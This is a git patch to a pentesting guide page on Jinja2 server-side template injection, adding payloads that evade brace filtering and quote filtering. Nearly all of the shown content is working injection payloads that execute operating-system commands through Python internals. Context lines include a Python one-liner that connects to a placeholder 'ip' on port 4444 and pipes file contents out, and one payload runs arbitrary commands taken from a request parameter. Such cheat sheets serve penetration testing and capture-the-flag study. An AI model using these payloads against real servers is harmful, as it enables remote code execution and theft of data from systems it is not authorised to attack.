From 0954fe38a897b91d118a4aae800271f07df477ae Mon Sep 17 00:00:00 2001 From: Mane Date: Thu, 28 Mar 2024 15:48:56 +0800 Subject: [PATCH] Update jinja2-ssti.md # Reference https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/ https://ctftime.org/writeup/33605 --- .../ssti-server-side-template-injection/jinja2-ssti.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md b/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md index b69722dd1..c97e78519 100644 --- a/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md +++ b/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md @@ -153,8 +153,10 @@ The call to `__subclasses__` has given us the opportunity to **access hundreds o # The class 396 is the class {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} -# Calling os.popen without guessing the index of the class +# Without '{{' and '}}' +{% if request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('id')['read']() == 'chiv' %} a {% endif %} +# Calling os.popen without guessing the index of the class {% raw %} {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{% endfor %} {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} @@ -163,6 +165,8 @@ The call to `__subclasses__` has given us the opportunity to **access hundreds o {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%} {% endraw %} +## Passing the cmd line ?cmd=id, Without " and ' +{{ dict.mro()[-1].__subclasses__()[276](request.args.cmd,shell=True,stdout=-1).communicate()[0].strip() }} ```